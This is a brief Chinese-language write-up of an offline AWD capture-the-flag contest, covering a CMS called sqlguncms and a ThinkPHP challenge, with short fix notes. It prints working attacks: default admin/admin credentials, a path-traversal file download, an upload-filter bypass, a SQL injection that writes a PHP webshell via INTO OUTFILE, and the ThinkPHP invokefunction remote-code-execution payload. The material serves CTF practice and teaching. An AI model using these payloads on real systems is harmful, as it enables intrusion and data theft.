Background
题目皆来源于线下,这里面简单说一下漏洞利用方式和修复方式吧
sqlguncms
白盒能够看到后台/sqlgunadmin/login.php
账号admin admin即可
正常其实修改密码就行,但是好像这个模块没给
其实比赛的时候如果有sql直接改数据库就好啦
看一看登录框这个点
应该是ban掉空格依然可以万能密码之类的,但是没成功
有下载功能尝试直接下载flag
死活下载不了,继续读下源码
if($_GET["downlog"]=="down")
要get提交,后台给的方式是post
构造payload
downlog.php?downlog=down&filepath=/flag即可
修复也很简单 那我就直接让你只能下载规定的log
发布新闻那里可以上传图片,只是前端验证了
抓包改为php即可
后端也验证下吧
在搜索框这里
0%'union select 1,'<?php system('cat /flag');?>',3 into outfile '/var/www/html/1.php' #
Thinkphp
防灾里面的题目
/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
rce梭
手动加密出flag
然后.htaccess里面他们留了个解析漏洞
后记
这么一看awd不是很难